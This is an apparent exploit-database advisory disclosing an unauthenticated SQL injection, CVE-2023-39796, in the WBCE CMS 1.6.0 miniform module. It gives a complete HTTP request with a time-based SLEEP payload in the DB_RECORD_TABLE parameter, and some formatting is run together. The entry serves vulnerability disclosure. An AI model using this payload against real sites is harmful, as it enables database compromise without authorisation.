# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0# Date: 15.11.2023 # Exploit Author: young pope # Vendor Homepage: https://github.com/WBCE/WBCE_CMS # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip # Version: 1.6.0 # Tested on: Kali linux # CVE : CVE-2023-39796
There is an sql injection vulnerability in*miniform* module which is a
default module installed in the *WBCE* cms. It is an unauthenticated
sqli so anyone could access it and takeover the whole database.
In file/modules/miniform/ajax_delete_message.php there is no
authentication check. On line |40|in this file, there is a |DELETE|
query that is vulnerable, an attacker could jump from the query using
tick sign - ```.
Function |addslashes()|(https://www.php.net/manual/en/function.addslashes.php) escapes only
these characters andnot a tick sign:* single quote (')* double quote (")* backslash ()* NUL (the NUL byte
The DB_RECORD_TABLE parameter is vulnerable.
If an unauthenticated attacker send this request:
```
POST /modules/miniform/ajax_delete_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(X11; OpenBSD i386) AppleWebKit/537.36(KHTML,
like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length:162
Accept:*/*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record
```
The response is received after 6s.
Reference links:* https://nvd.nist.gov/vuln/detail/CVE-2023-39796* https://forum.wbce.org/viewtopic.php?pid=42046#p42046* https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1* https://pastebin.com/PBw5AvGp
